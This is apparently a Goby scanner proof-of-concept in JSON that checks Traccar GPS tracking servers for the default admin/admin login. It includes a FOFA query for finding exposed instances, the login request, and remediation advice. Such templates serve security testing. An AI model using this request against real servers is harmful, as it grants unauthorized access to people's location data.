Goby/json/Traccar-Default-password.json


{
"Name": "Traccar Default password",
"Description": "<p>Traccar is an open source GPS tracking system. Traccar has a weak password vulnerability, which can be used by attackers to obtain sensitive information.</p><p><br></p><p>Username admin password admin</p>",
"Product": "Traccar",
"Homepage": "https://www.traccar.org/",
"DisclosureDate": "2022-03-30",
"Author": "xiaodan",
"FofaQuery": "title=\"Traccar\"",
"GobyQuery": "title=\"Traccar\"",
"Level": "1",
"Impact": "<p>Traccar is an open source GPS tracking system. Traccar has a weak password vulnerability, which can be used by attackers to obtain sensitive information.</p><p>Username admin password admin</p>",
"Recommendation": "<p>1. Modify the default password. The password should preferably contain uppercase and lowercase letters, numbers, and special characters, with more than 8 digits.</p><p>2. If not necessary, prohibit public network access to the system.</p><p>3. Set access policies and whitelist access through security devices such as firewalls.</p>",
"References": [
"https://fofa.so/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/api/session",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "email=admin&password=admin&undefined=false"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "name\":\"admin\"",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/api/session",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "email=admin&password=admin&undefined=false"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "name\":\"admin\"",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|text|admin:admin"
]
}
],
"Tags": [
"default password"
],
"VulType": [
"default password"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
"CNVD-2021-40750"
],
"CVSSScore": "5",
"Translation": {
"CN": {
"Name": "Traccar 默认密码",
"Product": "Traccar",
"Description": "<p><code></code><span style=\"font-size: 16px;\"></span>Traccar是一个开源的GPS跟踪系统。 Traccar存在弱口令漏洞攻击者可利用该漏洞获取敏感信息。<span style=\"font-size: 16px;\"></span><span style=\"font-size: 16px;\"></span><br></p><p>用户名admin密码admin</p>",
"Recommendation": "<p>1、修改默认口令密码最好包含大小写字母、数字和特殊字符等且位数大于8位。</p><p>2、如非必要禁止公网访问该系统。</p><p>3、通过防火墙等安全设备设置访问策略设置白名单访问。</p>",
"Impact": "<p>Traccar是一个开源的GPS跟踪系统。 Traccar存在弱口令漏洞攻击者可利用该漏洞获取敏感信息。<br></p><p>用户名admin密码admin</p>",
"VulType": [
"默认口令"
],
"Tags": [
"默认口令"
]
},
"EN": {
"Name": "Traccar Default password",
"Product": "Traccar",
"Description": "<p>Traccar is an open source GPS tracking system. Traccar has a weak password vulnerability, which can be used by attackers to obtain sensitive information.</p><p><br></p><p>Username admin password admin</p>",
"Recommendation": "<p>1. Modify the default password. The password should preferably contain uppercase and lowercase letters, numbers, and special characters, with more than 8 digits.</p><p>2. If not necessary, prohibit public network access to the system.</p><p>3. Set access policies and whitelist access through security devices such as firewalls.</p>",
"Impact": "<p>Traccar is an open source GPS tracking system. Traccar has a weak password vulnerability, which can be used by attackers to obtain sensitive information.</p><p>Username admin password admin</p>",
"VulType": [
"default password"
],
"Tags": [
"default password"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}